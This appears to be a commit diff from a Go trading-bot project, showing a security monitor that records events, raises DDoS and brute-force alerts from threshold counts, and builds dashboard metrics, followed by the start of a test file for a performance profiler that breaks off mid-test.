	// GetName identifies the handler in error events.
	GetName() string
}
// NewSecurityMonitor creates a new security monitor and starts its three
// background goroutines (alert processing, metrics collection, cleanup).
// A nil config selects the defaults; otherwise booleans and the webhook URL
// are copied verbatim while numeric/duration fields override the defaults
// only when set to a positive value.
func NewSecurityMonitor(config *MonitorConfig) *SecurityMonitor {
	cfg := defaultMonitorConfig()
	if config != nil {
		// Unconditional copies: flags and webhook target.
		cfg.EnableAlerts = config.EnableAlerts
		cfg.EmailNotifications = config.EmailNotifications
		cfg.SlackNotifications = config.SlackNotifications
		cfg.WebhookURL = config.WebhookURL
		// Positive-only overrides: a zero value keeps the default.
		if config.AlertBuffer > 0 {
			cfg.AlertBuffer = config.AlertBuffer
		}
		if config.MaxEvents > 0 {
			cfg.MaxEvents = config.MaxEvents
		}
		if config.DDoSThreshold > 0 {
			cfg.DDoSThreshold = config.DDoSThreshold
		}
		if config.ErrorRateThreshold > 0 {
			cfg.ErrorRateThreshold = config.ErrorRateThreshold
		}
		if config.AlertRetention > 0 {
			cfg.AlertRetention = config.AlertRetention
		}
		if config.EventRetention > 0 {
			cfg.EventRetention = config.EventRetention
		}
		if config.MetricsInterval > 0 {
			cfg.MetricsInterval = config.MetricsInterval
		}
		if config.CleanupInterval > 0 {
			cfg.CleanupInterval = config.CleanupInterval
		}
	}
	monitor := &SecurityMonitor{
		alertChan:     make(chan SecurityAlert, cfg.AlertBuffer),
		stopChan:      make(chan struct{}),
		events:        make([]SecurityEvent, 0),
		maxEvents:     cfg.MaxEvents,
		config:        cfg,
		alertHandlers: make([]AlertHandler, 0),
		metrics: &SecurityMetrics{
			HourlyMetrics: make(map[string]int64),
			DailyMetrics:  make(map[string]int64),
			LastUpdated:   time.Now(),
		},
	}
	// Start monitoring routines; all of them exit when Stop closes stopChan.
	go monitor.alertProcessor()
	go monitor.metricsCollector()
	go monitor.cleanupRoutine()
	return monitor
}
// defaultMonitorConfig returns the baseline monitoring configuration used
// when the caller does not override a setting.
func defaultMonitorConfig() *MonitorConfig {
	const day = 24 * time.Hour
	return &MonitorConfig{
		EnableAlerts:       true,
		AlertBuffer:        1000,
		AlertRetention:     day,
		MaxEvents:          10000,
		EventRetention:     7 * day,
		MetricsInterval:    time.Minute,
		CleanupInterval:    time.Hour,
		DDoSThreshold:      1000,
		ErrorRateThreshold: 0.05,
	}
}
// RecordEvent records a security event into the bounded in-memory log,
// folds it into the metrics, and evaluates whether it (alone or combined
// with recent history) warrants alerts.
func (sm *SecurityMonitor) RecordEvent(eventType EventType, source, description string, severity EventSeverity, data map[string]interface{}) {
	event := SecurityEvent{
		ID:          fmt.Sprintf("evt_%d", time.Now().UnixNano()),
		Timestamp:   time.Now(),
		Type:        eventType,
		Source:      source,
		Description: description,
		Data:        data,
		Severity:    severity,
	}
	// Promote well-known metadata keys onto dedicated event fields when the
	// caller supplied them as strings (nil data maps are safe to read).
	if ipStr, ok := data["ip_address"].(string); ok {
		event.IPAddress = ipStr
	}
	if uaStr, ok := data["user_agent"].(string); ok {
		event.UserAgent = uaStr
	}

	sm.eventsMutex.Lock()
	sm.events = append(sm.events, event)
	// Enforce the log cap by dropping the oldest entries.
	if overflow := len(sm.events) - sm.maxEvents; overflow > 0 {
		sm.events = sm.events[overflow:]
	}
	sm.eventsMutex.Unlock()

	sm.updateMetricsForEvent(event)
	sm.checkForAlerts(event)
}
// TriggerAlert manually constructs a security alert and queues it for the
// background alert processor. The send is non-blocking: if the buffer is
// saturated the alert is dropped and the condition is itself recorded as a
// high-severity error event.
func (sm *SecurityMonitor) TriggerAlert(level AlertLevel, alertType AlertType, title, description, source string, data map[string]interface{}, actions []string) {
	alert := SecurityAlert{
		ID:          fmt.Sprintf("alert_%d", time.Now().UnixNano()),
		Timestamp:   time.Now(),
		Level:       level,
		Type:        alertType,
		Title:       title,
		Description: description,
		Source:      source,
		Data:        data,
		Actions:     actions,
		Resolved:    false,
	}
	select {
	case sm.alertChan <- alert:
		// Queued for the processor.
	default:
		// Buffer full — surface the drop rather than blocking the caller.
		sm.RecordEvent(EventTypeError, "SecurityMonitor", "Alert channel full", SeverityHigh, map[string]interface{}{
			"alert_type":  alertType,
			"alert_level": level,
		})
	}
}
// checkForAlerts inspects a single event and raises type-specific alerts
// for severities that demand attention, then scans recent history for
// attack patterns.
func (sm *SecurityMonitor) checkForAlerts(event SecurityEvent) {
	isCritical := event.Severity == SeverityCritical
	isElevated := isCritical || event.Severity == SeverityHigh

	switch event.Type {
	case EventTypeKeyAccess:
		if isCritical {
			sm.TriggerAlert(
				AlertLevelCritical,
				AlertTypeKeyCompromise,
				"Critical Key Access Event",
				"A critical key access event was detected",
				event.Source,
				event.Data,
				[]string{"Investigate immediately", "Rotate keys if compromised", "Review access logs"},
			)
		}
	case EventTypeTransaction:
		if isElevated {
			sm.TriggerAlert(
				AlertLevelError,
				AlertTypeTransaction,
				"Suspicious Transaction Detected",
				"A suspicious transaction was detected and blocked",
				event.Source,
				event.Data,
				[]string{"Review transaction details", "Check for pattern", "Update security rules"},
			)
		}
	case EventTypeError:
		if isCritical {
			sm.TriggerAlert(
				AlertLevelCritical,
				AlertTypeConfiguration,
				"Critical System Error",
				"A critical system error occurred",
				event.Source,
				event.Data,
				[]string{"Check system logs", "Verify configuration", "Restart services if needed"},
			)
		}
	}
	// Regardless of per-event alerts, look for attack patterns in history.
	sm.checkAttackPatterns(event)
}
// checkAttackPatterns scans events from the last five minutes for
// volumetric (DDoS) and brute-force patterns and raises alerts when the
// configured thresholds are exceeded.
//
// FIX: the event snapshot is taken under the read lock and the lock is
// released BEFORE any alert is raised. The previous version held
// eventsMutex.RLock for the whole function; TriggerAlert falls back to
// RecordEvent when the alert channel is full, and RecordEvent acquires the
// events write lock — taking a write lock while the same goroutine holds
// the read lock self-deadlocks.
func (sm *SecurityMonitor) checkAttackPatterns(event SecurityEvent) {
	cutoff := time.Now().Add(-5 * time.Minute)

	// Snapshot recent events, then release the lock before alerting.
	sm.eventsMutex.RLock()
	recentEvents := make([]SecurityEvent, 0)
	for _, e := range sm.events {
		if e.Timestamp.After(cutoff) {
			recentEvents = append(recentEvents, e)
		}
	}
	sm.eventsMutex.RUnlock()

	// Check for DDoS patterns: total volume above threshold, then per-IP
	// counts above a tenth of the threshold.
	if len(recentEvents) > sm.config.DDoSThreshold {
		ipCounts := make(map[string]int)
		for _, e := range recentEvents {
			if e.IPAddress != "" {
				ipCounts[e.IPAddress]++
			}
		}
		for ip, count := range ipCounts {
			if count > sm.config.DDoSThreshold/10 {
				sm.TriggerAlert(
					AlertLevelError,
					AlertTypeDDoS,
					"DDoS Attack Detected",
					fmt.Sprintf("High request volume from IP %s", ip),
					"SecurityMonitor",
					map[string]interface{}{
						"ip_address":    ip,
						"request_count": count,
						"time_window":   "5 minutes",
					},
					[]string{"Block IP address", "Investigate traffic pattern", "Scale infrastructure if needed"},
				)
			}
		}
	}

	// Check for brute force patterns: failed logins surface here as
	// high-severity login events.
	failedLogins := 0
	for _, e := range recentEvents {
		if e.Type == EventTypeLogin && e.Severity == SeverityHigh {
			failedLogins++
		}
	}
	if failedLogins > 10 {
		sm.TriggerAlert(
			AlertLevelWarning,
			AlertTypeBruteForce,
			"Brute Force Attack Detected",
			"Multiple failed login attempts detected",
			"SecurityMonitor",
			map[string]interface{}{
				"failed_attempts": failedLogins,
				"time_window":     "5 minutes",
			},
			[]string{"Review access logs", "Consider IP blocking", "Strengthen authentication"},
		)
	}
}
// updateMetricsForEvent folds a single event into the aggregate counters
// and the hourly/daily time-series buckets.
func (sm *SecurityMonitor) updateMetricsForEvent(event SecurityEvent) {
	sm.metricsMutex.Lock()
	defer sm.metricsMutex.Unlock()

	m := sm.metrics
	m.TotalRequests++

	elevated := event.Severity == SeverityHigh || event.Severity == SeverityCritical
	switch event.Type {
	case EventTypeKeyAccess:
		m.KeyAccessAttempts++
		if elevated {
			m.FailedKeyAccess++
		}
	case EventTypeTransaction:
		m.TransactionsAnalyzed++
		if elevated {
			m.SuspiciousTransactions++
		}
	}

	// Bucket by hour ("2006-01-02-15") and day ("2006-01-02") for
	// time-series reporting.
	m.HourlyMetrics[event.Timestamp.Format("2006-01-02-15")]++
	m.DailyMetrics[event.Timestamp.Format("2006-01-02")]++
	m.LastUpdated = time.Now()
}
// alertProcessor drains the alert channel until Stop closes stopChan,
// fanning each alert out to the registered handlers.
func (sm *SecurityMonitor) alertProcessor() {
	for {
		select {
		case <-sm.stopChan:
			return
		case alert := <-sm.alertChan:
			sm.dispatchAlert(alert)
		}
	}
}

// dispatchAlert hands one alert to every handler on its own goroutine,
// recording a medium-severity error event for each handler that fails.
func (sm *SecurityMonitor) dispatchAlert(alert SecurityAlert) {
	for _, handler := range sm.alertHandlers {
		go func(h AlertHandler, a SecurityAlert) {
			if err := h.HandleAlert(a); err != nil {
				sm.RecordEvent(
					EventTypeError,
					"AlertHandler",
					fmt.Sprintf("Failed to handle alert: %v", err),
					SeverityMedium,
					map[string]interface{}{
						"handler":  h.GetName(),
						"alert_id": a.ID,
						"error":    err.Error(),
					},
				)
			}
		}(handler, alert)
	}
}
// metricsCollector refreshes metrics on every MetricsInterval tick until
// Stop closes stopChan.
func (sm *SecurityMonitor) metricsCollector() {
	ticker := time.NewTicker(sm.config.MetricsInterval)
	defer ticker.Stop()
	for {
		select {
		case <-sm.stopChan:
			return
		case <-ticker.C:
			sm.collectMetrics()
		}
	}
}
// collectMetrics refreshes system-level metrics. It currently only bumps
// the LastUpdated timestamp; richer collection would hook in here.
func (sm *SecurityMonitor) collectMetrics() {
	sm.metricsMutex.Lock()
	sm.metrics.LastUpdated = time.Now()
	sm.metricsMutex.Unlock()
}
// cleanupRoutine prunes old events and stale metric buckets on every
// CleanupInterval tick until Stop closes stopChan.
func (sm *SecurityMonitor) cleanupRoutine() {
	ticker := time.NewTicker(sm.config.CleanupInterval)
	defer ticker.Stop()
	for {
		select {
		case <-sm.stopChan:
			return
		case <-ticker.C:
			sm.cleanup()
		}
	}
}
// cleanup drops events older than EventRetention and trims stale hourly
// (48 h window) and daily (30 day window) metric buckets.
//
// FIX: the events lock is released before the metrics lock is taken. The
// previous version deferred both unlocks, holding the events write lock for
// the entire metrics sweep — blocking all event recording and creating a
// lock-nesting hazard for no benefit, since the two sections are independent.
func (sm *SecurityMonitor) cleanup() {
	// Phase 1: prune the event log under the events lock only.
	cutoff := time.Now().Add(-sm.config.EventRetention)
	sm.eventsMutex.Lock()
	newEvents := make([]SecurityEvent, 0)
	for _, event := range sm.events {
		if event.Timestamp.After(cutoff) {
			newEvents = append(newEvents, event)
		}
	}
	sm.events = newEvents
	sm.eventsMutex.Unlock()

	// Phase 2: prune time-series buckets under the metrics lock only.
	sm.metricsMutex.Lock()
	defer sm.metricsMutex.Unlock()
	// Remove old hourly metrics (keep last 48 hours)
	hourCutoff := time.Now().Add(-48 * time.Hour)
	for hour := range sm.metrics.HourlyMetrics {
		if t, err := time.Parse("2006-01-02-15", hour); err == nil && t.Before(hourCutoff) {
			delete(sm.metrics.HourlyMetrics, hour)
		}
	}
	// Remove old daily metrics (keep last 30 days)
	dayCutoff := time.Now().Add(-30 * 24 * time.Hour)
	for day := range sm.metrics.DailyMetrics {
		if t, err := time.Parse("2006-01-02", day); err == nil && t.Before(dayCutoff) {
			delete(sm.metrics.DailyMetrics, day)
		}
	}
}
// AddAlertHandler registers an alert handler that will receive every alert
// dispatched by the background processor.
//
// NOTE(review): the append is unsynchronized while alertProcessor reads
// sm.alertHandlers concurrently — a data race if handlers are registered
// after alerts start flowing. Register all handlers immediately after
// NewSecurityMonitor, or guard the slice with a mutex (requires a new
// struct field).
func (sm *SecurityMonitor) AddAlertHandler(handler AlertHandler) {
	sm.alertHandlers = append(sm.alertHandlers, handler)
}
// GetEvents returns a copy of the most recent security events, oldest
// first within the returned slice. A non-positive or oversized limit
// returns all stored events.
func (sm *SecurityMonitor) GetEvents(limit int) []SecurityEvent {
	sm.eventsMutex.RLock()
	defer sm.eventsMutex.RUnlock()

	n := limit
	if n <= 0 || n > len(sm.events) {
		n = len(sm.events)
	}
	out := make([]SecurityEvent, n)
	copy(out, sm.events[len(sm.events)-n:])
	return out
}
// GetMetrics returns a snapshot of the current security metrics. The struct
// and both time-series maps are copied so callers cannot race with the
// monitor's own updates.
func (sm *SecurityMonitor) GetMetrics() *SecurityMetrics {
	sm.metricsMutex.RLock()
	defer sm.metricsMutex.RUnlock()

	snapshot := *sm.metrics
	snapshot.HourlyMetrics = make(map[string]int64, len(sm.metrics.HourlyMetrics))
	snapshot.DailyMetrics = make(map[string]int64, len(sm.metrics.DailyMetrics))
	for k, v := range sm.metrics.HourlyMetrics {
		snapshot.HourlyMetrics[k] = v
	}
	for k, v := range sm.metrics.DailyMetrics {
		snapshot.DailyMetrics[k] = v
	}
	return &snapshot
}
// GetDashboardData assembles the security-dashboard payload: a metrics
// snapshot, the last 100 events, a per-type count of activity within the
// last hour, and the status/alert summaries.
func (sm *SecurityMonitor) GetDashboardData() map[string]interface{} {
	metrics := sm.GetMetrics()
	recentEvents := sm.GetEvents(100)

	hourAgo := time.Now().Add(-time.Hour)
	recentActivity := make(map[string]int)
	for _, event := range recentEvents {
		if event.Timestamp.After(hourAgo) {
			recentActivity[string(event.Type)]++
		}
	}

	return map[string]interface{}{
		"metrics":         metrics,
		"recent_events":   recentEvents,
		"recent_activity": recentActivity,
		"system_status":   sm.getSystemStatus(),
		"alert_summary":   sm.getAlertSummary(),
	}
}
// getSystemStatus returns the current system security status derived from
// the aggregate metrics.
//
// FIX: success_rate previously divided by TotalRequests unconditionally;
// with zero requests that float division yields NaN, which encoding/json
// rejects (UnsupportedValueError) and would break dashboard serialization.
// With no requests yet, the success rate is reported as 1.0.
func (sm *SecurityMonitor) getSystemStatus() map[string]interface{} {
	metrics := sm.GetMetrics()
	status := "HEALTHY"
	if metrics.BlockedRequests > 0 || metrics.SuspiciousRequests > 0 {
		status = "MONITORING"
	}
	if metrics.DDoSAttempts > 0 || metrics.BruteForceAttempts > 0 {
		status = "UNDER_ATTACK"
	}
	successRate := 1.0
	if metrics.TotalRequests > 0 {
		successRate = float64(metrics.TotalRequests-metrics.BlockedRequests) / float64(metrics.TotalRequests)
	}
	return map[string]interface{}{
		"status": status,
		// NOTE(review): this is the time since the last metrics update, not
		// process uptime — confirm the intended meaning of "uptime".
		"uptime":           time.Since(metrics.LastUpdated).String(),
		"total_requests":   metrics.TotalRequests,
		"blocked_requests": metrics.BlockedRequests,
		"success_rate":     successRate,
	}
}
// getAlertSummary returns a summary of recent alerts. Alerts are not yet
// persisted to a dedicated store, so this is currently a static placeholder.
func (sm *SecurityMonitor) getAlertSummary() map[string]interface{} {
	summary := map[string]interface{}{
		"total_alerts":      0,
		"critical_alerts":   0,
		"unresolved_alerts": 0,
		"last_alert":        nil,
	}
	return summary
}
// Stop terminates the monitor's background goroutines (alert processing,
// metrics collection, cleanup) by closing the stop channel.
//
// NOTE(review): calling Stop more than once panics (close of closed
// channel). If repeated shutdown is possible, guard the close with a
// sync.Once field on the struct.
func (sm *SecurityMonitor) Stop() {
	close(sm.stopChan)
}
// ExportEvents serializes the full in-memory event log to indented JSON.
func (sm *SecurityMonitor) ExportEvents() ([]byte, error) {
	sm.eventsMutex.RLock()
	defer sm.eventsMutex.RUnlock()
	return json.MarshalIndent(sm.events, "", "  ")
}
// ExportMetrics serializes a snapshot of the current metrics to indented JSON.
func (sm *SecurityMonitor) ExportMetrics() ([]byte, error) {
	return json.MarshalIndent(sm.GetMetrics(), "", "  ")
}
// GetRecentAlerts returns up to limit of the most recent security events,
// newest first, converted into the SecurityAlert shape the dashboard
// expects (event type and severity are reused as alert type and level).
func (sm *SecurityMonitor) GetRecentAlerts(limit int) []*SecurityAlert {
	sm.eventsMutex.RLock()
	defer sm.eventsMutex.RUnlock()

	alerts := make([]*SecurityAlert, 0)
	for i := len(sm.events) - 1; i >= 0 && len(alerts) < limit; i-- {
		event := sm.events[i]
		alerts = append(alerts, &SecurityAlert{
			ID:          fmt.Sprintf("alert_%d", i),
			Type:        AlertType(event.Type),
			Level:       AlertLevel(event.Severity),
			Title:       "Security Alert",
			Description: event.Description,
			Timestamp:   event.Timestamp,
			Source:      event.Source,
			Data:        event.Data,
		})
	}
	return alerts
}

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,586 @@
package security
import (
"encoding/json"
"runtime"
"testing"
"time"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
"github.com/fraktal/mev-beta/internal/logger"
)
// TestNewPerformanceProfiler verifies constructor defaults (1s sampling
// interval, 24h retention) and that a fully-populated custom ProfilerConfig
// is applied verbatim.
func TestNewPerformanceProfiler(t *testing.T) {
	testLogger := logger.New("info", "text", "/tmp/test.log")
	// Test with default config
	profiler := NewPerformanceProfiler(testLogger, nil)
	assert.NotNil(t, profiler)
	assert.NotNil(t, profiler.config)
	assert.Equal(t, time.Second, profiler.config.SamplingInterval)
	assert.Equal(t, 24*time.Hour, profiler.config.RetentionPeriod)
	// Test with custom config
	customConfig := &ProfilerConfig{
		SamplingInterval:   500 * time.Millisecond,
		RetentionPeriod:    12 * time.Hour,
		MaxOperations:      500,
		MaxMemoryUsage:     512 * 1024 * 1024,
		MaxGoroutines:      500,
		MaxResponseTime:    500 * time.Millisecond,
		MinThroughput:      50,
		EnableGCMetrics:    false,
		EnableCPUProfiling: false,
		EnableMemProfiling: false,
		ReportInterval:     30 * time.Minute,
		AutoOptimize:       true,
	}
	profiler2 := NewPerformanceProfiler(testLogger, customConfig)
	assert.NotNil(t, profiler2)
	assert.Equal(t, 500*time.Millisecond, profiler2.config.SamplingInterval)
	assert.Equal(t, 12*time.Hour, profiler2.config.RetentionPeriod)
	assert.True(t, profiler2.config.AutoOptimize)
	// Cleanup
	profiler.Stop()
	profiler2.Stop()
}
// TestOperationTracking verifies that a completed operation is recorded under
// its name with call count, durations, and a zero error rate.
func TestOperationTracking(t *testing.T) {
	testLogger := logger.New("info", "text", "/tmp/test.log")
	profiler := NewPerformanceProfiler(testLogger, nil)
	defer profiler.Stop()
	// Test basic operation tracking
	tracker := profiler.StartOperation("test_operation")
	time.Sleep(10 * time.Millisecond) // Simulate work
	tracker.End()
	// Verify operation was recorded
	profiler.mutex.RLock()
	profile, exists := profiler.operations["test_operation"]
	profiler.mutex.RUnlock()
	assert.True(t, exists)
	assert.Equal(t, "test_operation", profile.Operation)
	assert.Equal(t, int64(1), profile.TotalCalls)
	assert.Greater(t, profile.TotalDuration, time.Duration(0))
	assert.Greater(t, profile.AverageTime, time.Duration(0))
	assert.Equal(t, 0.0, profile.ErrorRate)
	assert.NotEmpty(t, profile.PerformanceClass)
}
// TestOperationTrackingWithError verifies that EndWithError records the error
// count, a 100% error rate for a single failing call, and the last-error info.
func TestOperationTrackingWithError(t *testing.T) {
	testLogger := logger.New("info", "text", "/tmp/test.log")
	profiler := NewPerformanceProfiler(testLogger, nil)
	defer profiler.Stop()
	// Test operation tracking with error
	tracker := profiler.StartOperation("error_operation")
	time.Sleep(5 * time.Millisecond)
	tracker.EndWithError(assert.AnError)
	// Verify error was recorded
	profiler.mutex.RLock()
	profile, exists := profiler.operations["error_operation"]
	profiler.mutex.RUnlock()
	assert.True(t, exists)
	assert.Equal(t, int64(1), profile.ErrorCount)
	assert.Equal(t, 100.0, profile.ErrorRate)
	assert.Equal(t, assert.AnError.Error(), profile.LastError)
	assert.False(t, profile.LastErrorTime.IsZero())
}
// TestPerformanceClassification verifies that operation duration maps to the
// expected performance class (excellent/good/average) via table-driven cases.
// NOTE(review): sleep-based timing makes these cases sensitive to scheduler
// jitter on loaded CI machines.
func TestPerformanceClassification(t *testing.T) {
	testLogger := logger.New("info", "text", "/tmp/test.log")
	profiler := NewPerformanceProfiler(testLogger, nil)
	defer profiler.Stop()
	testCases := []struct {
		name          string
		sleepDuration time.Duration
		expectedClass string
	}{
		{"excellent", 1 * time.Millisecond, "excellent"},
		{"good", 20 * time.Millisecond, "good"},
		{"average", 100 * time.Millisecond, "average"},
	}
	for _, tc := range testCases {
		t.Run(tc.name, func(t *testing.T) {
			tracker := profiler.StartOperation(tc.name)
			time.Sleep(tc.sleepDuration)
			tracker.End()
			profiler.mutex.RLock()
			profile := profiler.operations[tc.name]
			profiler.mutex.RUnlock()
			assert.Equal(t, tc.expectedClass, profile.PerformanceClass)
		})
	}
}
// TestSystemMetricsCollection verifies that the background sampler populates
// heap/goroutine/GC metrics and the resource-usage snapshot within two
// sampling intervals.
func TestSystemMetricsCollection(t *testing.T) {
	testLogger := logger.New("info", "text", "/tmp/test.log")
	config := &ProfilerConfig{
		SamplingInterval: 100 * time.Millisecond,
		RetentionPeriod:  time.Hour,
	}
	profiler := NewPerformanceProfiler(testLogger, config)
	defer profiler.Stop()
	// Wait for metrics collection
	time.Sleep(200 * time.Millisecond)
	profiler.mutex.RLock()
	metrics := profiler.metrics
	resourceUsage := profiler.resourceUsage
	profiler.mutex.RUnlock()
	// Verify system metrics were collected
	assert.NotNil(t, metrics["heap_alloc"])
	assert.NotNil(t, metrics["heap_sys"])
	assert.NotNil(t, metrics["goroutines"])
	assert.NotNil(t, metrics["gc_cycles"])
	// Verify resource usage was updated
	assert.Greater(t, resourceUsage.HeapUsed, uint64(0))
	// NOTE(review): this assertion is vacuous — an unsigned value is always
	// >= 0; consider asserting on a field that can actually fail.
	assert.GreaterOrEqual(t, resourceUsage.GCCycles, uint32(0))
	assert.False(t, resourceUsage.Timestamp.IsZero())
}
// TestPerformanceAlerts verifies that an operation exceeding the configured
// MaxResponseTime produces a response_time alert with warning/critical
// severity and a value above the threshold.
func TestPerformanceAlerts(t *testing.T) {
	testLogger := logger.New("info", "text", "/tmp/test.log")
	config := &ProfilerConfig{
		SamplingInterval: time.Second,
		MaxResponseTime:  10 * time.Millisecond, // Very low threshold for testing
	}
	profiler := NewPerformanceProfiler(testLogger, config)
	defer profiler.Stop()
	// Trigger a slow operation to generate alert
	tracker := profiler.StartOperation("slow_operation")
	time.Sleep(50 * time.Millisecond) // Exceeds threshold
	tracker.End()
	// Check if alert was generated
	profiler.mutex.RLock()
	alerts := profiler.alerts
	profiler.mutex.RUnlock()
	assert.NotEmpty(t, alerts)
	foundAlert := false
	for _, alert := range alerts {
		if alert.Operation == "slow_operation" && alert.Type == "response_time" {
			foundAlert = true
			assert.Contains(t, []string{"warning", "critical"}, alert.Severity)
			assert.Greater(t, alert.Value, 10.0) // Should exceed 10ms threshold
			break
		}
	}
	assert.True(t, foundAlert, "Expected to find response time alert for slow operation")
}
// TestReportGeneration verifies GenerateReport produces a structurally
// complete report (ID, timestamp, health score in [0,100], top operations,
// resource summary, trend analysis, optimization plan) after two operations.
func TestReportGeneration(t *testing.T) {
	testLogger := logger.New("info", "text", "/tmp/test.log")
	profiler := NewPerformanceProfiler(testLogger, nil)
	defer profiler.Stop()
	// Generate some test data
	tracker1 := profiler.StartOperation("fast_op")
	time.Sleep(1 * time.Millisecond)
	tracker1.End()
	tracker2 := profiler.StartOperation("slow_op")
	time.Sleep(50 * time.Millisecond)
	tracker2.End()
	// Generate report
	report, err := profiler.GenerateReport()
	require.NoError(t, err)
	assert.NotNil(t, report)
	// Verify report structure
	assert.NotEmpty(t, report.ID)
	assert.False(t, report.Timestamp.IsZero())
	assert.NotEmpty(t, report.OverallHealth)
	assert.GreaterOrEqual(t, report.HealthScore, 0.0)
	assert.LessOrEqual(t, report.HealthScore, 100.0)
	// Verify operations are included
	assert.NotEmpty(t, report.TopOperations)
	assert.NotNil(t, report.ResourceSummary)
	assert.NotNil(t, report.TrendAnalysis)
	assert.NotNil(t, report.OptimizationPlan)
	// Verify resource summary efficiencies are percentages
	assert.GreaterOrEqual(t, report.ResourceSummary.MemoryEfficiency, 0.0)
	assert.LessOrEqual(t, report.ResourceSummary.MemoryEfficiency, 100.0)
	assert.GreaterOrEqual(t, report.ResourceSummary.CPUEfficiency, 0.0)
	assert.LessOrEqual(t, report.ResourceSummary.CPUEfficiency, 100.0)
}
// TestBottleneckAnalysis checks that report generation surfaces a bottleneck
// for a deliberately slow operation. The final check is deliberately soft
// (logged, not failed) because classification thresholds may not flag it on
// every run.
func TestBottleneckAnalysis(t *testing.T) {
	testLogger := logger.New("info", "text", "/tmp/test.log")
	profiler := NewPerformanceProfiler(testLogger, nil)
	defer profiler.Stop()
	// Create operations with different performance characteristics
	tracker1 := profiler.StartOperation("critical_op")
	time.Sleep(200 * time.Millisecond) // This should be classified as poor/critical
	tracker1.End()
	tracker2 := profiler.StartOperation("good_op")
	time.Sleep(1 * time.Millisecond) // This should be excellent
	tracker2.End()
	// Generate report to trigger bottleneck analysis
	report, err := profiler.GenerateReport()
	require.NoError(t, err)
	// Should detect performance bottleneck for critical_op
	assert.NotEmpty(t, report.Bottlenecks)
	foundBottleneck := false
	for _, bottleneck := range report.Bottlenecks {
		if bottleneck.Operation == "critical_op" || bottleneck.Type == "performance" {
			foundBottleneck = true
			assert.Contains(t, []string{"medium", "high"}, bottleneck.Severity)
			assert.Greater(t, bottleneck.Impact, 0.0)
			break
		}
	}
	// Note: May not always find bottleneck due to classification thresholds
	if !foundBottleneck {
		t.Log("Bottleneck not detected - this may be due to classification thresholds")
	}
}
// TestImprovementSuggestions simulates memory pressure (100MB allocation) and
// a slow operation, then asserts the report contains at least one memory- or
// performance-area improvement suggestion.
func TestImprovementSuggestions(t *testing.T) {
	testLogger := logger.New("info", "text", "/tmp/test.log")
	profiler := NewPerformanceProfiler(testLogger, nil)
	defer profiler.Stop()
	// Simulate memory pressure by allocating memory
	largeData := make([]byte, 100*1024*1024) // 100MB
	_ = largeData
	// Force GC to update memory stats
	runtime.GC()
	time.Sleep(100 * time.Millisecond)
	// Create a slow operation
	tracker := profiler.StartOperation("slow_operation")
	time.Sleep(300 * time.Millisecond) // Should be classified as poor/critical
	tracker.End()
	// Generate report
	report, err := profiler.GenerateReport()
	require.NoError(t, err)
	// Should have improvement suggestions
	assert.NotNil(t, report.Improvements)
	// Look for memory or performance improvements
	hasMemoryImprovement := false
	hasPerformanceImprovement := false
	for _, suggestion := range report.Improvements {
		if suggestion.Area == "memory" {
			hasMemoryImprovement = true
		}
		if suggestion.Area == "operation_slow_operation" {
			hasPerformanceImprovement = true
		}
	}
	// At least one type of improvement should be suggested
	assert.True(t, hasMemoryImprovement || hasPerformanceImprovement,
		"Expected memory or performance improvement suggestions")
}
// TestMetricsExport verifies the three export paths: JSON (valid and
// non-empty), Prometheus exposition format (HELP/TYPE lines, mev_bot_
// prefix), and the error returned for an unsupported format.
func TestMetricsExport(t *testing.T) {
	testLogger := logger.New("info", "text", "/tmp/test.log")
	profiler := NewPerformanceProfiler(testLogger, nil)
	defer profiler.Stop()
	// Wait for some metrics to be collected
	time.Sleep(100 * time.Millisecond)
	// Test JSON export
	jsonData, err := profiler.ExportMetrics("json")
	require.NoError(t, err)
	assert.NotEmpty(t, jsonData)
	// Verify it's valid JSON
	var metrics map[string]*PerformanceMetric
	err = json.Unmarshal(jsonData, &metrics)
	require.NoError(t, err)
	assert.NotEmpty(t, metrics)
	// Test Prometheus export
	promData, err := profiler.ExportMetrics("prometheus")
	require.NoError(t, err)
	assert.NotEmpty(t, promData)
	assert.Contains(t, string(promData), "# HELP")
	assert.Contains(t, string(promData), "# TYPE")
	assert.Contains(t, string(promData), "mev_bot_")
	// Test unsupported format
	_, err = profiler.ExportMetrics("unsupported")
	assert.Error(t, err)
	assert.Contains(t, err.Error(), "unsupported export format")
}
// TestThresholdConfiguration verifies the default alert thresholds exist
// (memory, goroutines, response time, error rate) and that warning < critical
// with the "gt" comparison operator.
func TestThresholdConfiguration(t *testing.T) {
	testLogger := logger.New("info", "text", "/tmp/test.log")
	profiler := NewPerformanceProfiler(testLogger, nil)
	defer profiler.Stop()
	// Verify default thresholds were set
	profiler.mutex.RLock()
	thresholds := profiler.thresholds
	profiler.mutex.RUnlock()
	assert.NotEmpty(t, thresholds)
	assert.Contains(t, thresholds, "memory_usage")
	assert.Contains(t, thresholds, "goroutine_count")
	assert.Contains(t, thresholds, "response_time")
	assert.Contains(t, thresholds, "error_rate")
	// Verify threshold structure
	memThreshold := thresholds["memory_usage"]
	assert.Equal(t, "memory_usage", memThreshold.Metric)
	assert.Greater(t, memThreshold.Warning, 0.0)
	assert.Greater(t, memThreshold.Critical, memThreshold.Warning)
	assert.Equal(t, "gt", memThreshold.Operator)
}
// TestResourceEfficiencyCalculation verifies every efficiency score stays in
// [0,100] and that CPU efficiency exceeds 50 when only fast operations ran.
func TestResourceEfficiencyCalculation(t *testing.T) {
	testLogger := logger.New("info", "text", "/tmp/test.log")
	profiler := NewPerformanceProfiler(testLogger, nil)
	defer profiler.Stop()
	// Create operations with different performance classes
	tracker1 := profiler.StartOperation("excellent_op")
	time.Sleep(1 * time.Millisecond)
	tracker1.End()
	tracker2 := profiler.StartOperation("good_op")
	time.Sleep(20 * time.Millisecond)
	tracker2.End()
	// Calculate efficiencies
	memEfficiency := profiler.calculateMemoryEfficiency()
	cpuEfficiency := profiler.calculateCPUEfficiency()
	gcEfficiency := profiler.calculateGCEfficiency()
	throughputScore := profiler.calculateThroughputScore()
	// All efficiency scores should be between 0 and 100
	assert.GreaterOrEqual(t, memEfficiency, 0.0)
	assert.LessOrEqual(t, memEfficiency, 100.0)
	assert.GreaterOrEqual(t, cpuEfficiency, 0.0)
	assert.LessOrEqual(t, cpuEfficiency, 100.0)
	assert.GreaterOrEqual(t, gcEfficiency, 0.0)
	assert.LessOrEqual(t, gcEfficiency, 100.0)
	assert.GreaterOrEqual(t, throughputScore, 0.0)
	assert.LessOrEqual(t, throughputScore, 100.0)
	// CPU efficiency should be high since we have good operations
